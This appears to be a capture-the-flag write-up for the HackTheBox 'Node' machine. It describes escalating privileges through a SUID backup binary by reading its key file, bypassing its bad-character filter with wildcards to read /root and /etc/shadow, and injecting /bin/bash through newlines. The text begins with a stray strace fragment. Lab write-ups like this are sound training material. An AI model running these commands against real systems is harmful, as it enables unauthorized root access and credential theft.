read(3, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\300\207\1\0004\0\0\0"..., 512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=1775464, ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xf77cd000
mmap2(NULL, 1784348, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xf7619000
mprotect(0xf77c6000, 4096, PROT_NONE) = 0
mmap2(0xf77c7000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1ad000) = 0xf77c7000
mmap2(0xf77ca000, 10780, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xf77ca000
close(3) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xf7618000
set_thread_area({entry_number:-1, base_addr:0xf7618700, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0 (entry_number:12)
mprotect(0xf77c7000, 8192, PROT_READ) = 0
mprotect(0x804b000, 4096, PROT_READ) = 0
mprotect(0xf77fc000, 4096, PROT_READ) = 0
munmap(0xf77ce000, 31341) = 0
geteuid32() = 1000
setuid32(1000) = 0
exit_group(1) = ?
+++ exited with 1 +++
Writeup approach 1
https://0xstarlight.github.io/posts/HTB-Node-Writeup/#recon
Backup SUID
The api.js we found earlier generates the backup.
var proc = spawn('/usr/local/bin/backup', ['-q', backup_key, __dirname ]);
It takes three arguments: -q, then the backup key and the directory name. Let's run the file under strace to check what happens.
tom@node:/$ strace /usr/local/bin/backup a a a
At the end of the file we can notice it trying to read the contents of "/etc/myplace/keys".
[SNIP...]
) = 81
write(1, "\n", 1
) = 1
open("/etc/myplace/keys", O_RDONLY) = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=196, ...}) = 0
read(3, "a01a6aa5aaf1d7729f35c8278daae30f"..., 4096) = 196
read(3, "", 4096) = 0
write(1, " \33[33m[!]\33[37m Ah-ah-ah! You did"..., 57 [!] Ah-ah-ah! You didn't say the magic word!
) = 57
[SNIP...]
After reading the file, we can see it contains some keys. Maybe we can use these keys and read the root directory?
tom@node:/$ cat /etc/myplace/keys
a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508
45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474
3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110
Read Flag only [ Path I ]
Try reading the root folder.
tom@node:/$ backup -q a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 /root
The zip can be cracked with the same password as last time and the data read.
0xStarlight@kali$ cat unknown | base64 -d > unknown.zip
0xStarlight@kali$ unzip unknown.zip
0xStarlight@kali$ cat root.txt
Not that easy; you get this instead:
Let's try again, this time entering root without the / in the argument.
tom@node:/$ backup -q a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 root
This time there is more output. Let's do the same steps as before: extract the file and read its contents.
0xStarlight@kali$ unzip decode.zip
Archive: decode1.zip
creating: root/
[decode1.zip] root/.profile password:
inflating: root/.profile
inflating: root/.bash_history
creating: root/.cache/
extracting: root/.cache/motd.legal-displayed
extracting: root/root.txt
inflating: root/.bashrc
inflating: root/.viminfo
creating: root/.nano/
extracting: root/.nano/search_history
Looks like we have root.txt 🥳. But it is not over yet: we have no shell.
Wild Characters [ Path - II ]
Transfer this file to our local host and analyse it in Binary Ninja. Open the main function in the disassembly Graph view.
Scrolling down, we can see it treats /root as a bad string, which triggers the troll ASCII art.
Scrolling further down gives the list of all bad strings it refuses.
-
..
Continuing this way, we find all the bad characters.
Bad chars : .. /root ; & ` $ | /etc // / etc
Looking at the bad-character list, it contains neither * nor ~. We can use these to bypass the filter and read the /root directory and its contents. For example, running the following commands on the local machine:
$ cd ~
$ cd r**t
$ cd r??t
brings us back to our home directory, because there is no other directory they could match. So we can read the root flag this way. Let's try.
tom@node:/$ backup -q a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 /r**t/roo*.txt
This gives us the root.txt file content.
We can do the same steps as in Path I to extract the file and retrieve the flag. We could also try reading the /etc/shadow file, crack it, and then SSH to the machine as root.
tom@node:/$ backup -q a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 "/e*c/shado*" ; echo
Extract the file the same way as above and we can read the root hash from the shadow file.
Command Injection [ Path-III ]
Open the main function in the disassembly Graph view. Scroll down to the part that runs the zip command when the arguments are correct.
Here we can see the exec command that compresses the data, and below it a call to system; this means we can perform command injection in the third argument with the help of a newline, which is not a bad character, and get root. Now let's see how to do the command injection.
Open the main function in the ELF Linear view. If we enter the correct magic word, we can see a command being executed. It compresses the file contents, base64-encodes them and prints them on screen.
"/usr/bin/zip -r -P magicword %s %s > /dev/null"
From the command we can see that it takes the last argument and redirects it to /dev/null, so that part is not executed for us. So we can try to execute /bin/bash and get a root shell! The command injection looks like this:
"randomblahbla
/bin/bash
randomblahba"
We cannot do the injection in the first argument because it has a bad-character check for /, but not for characters on a new line; and we cannot put it last because that gets flushed to /dev/null.
Let's try it.
BOF [ Path - IV ]
A really good blog is written for this method of priv esc https://rastating.github.io/hackthebox-node-walkthrough/
References:
- https://www.runoob.com/mongodb/mongodb-tutorial.html
- https://0xstarlight.github.io/posts/HTB-Node-Writeup/#recon
End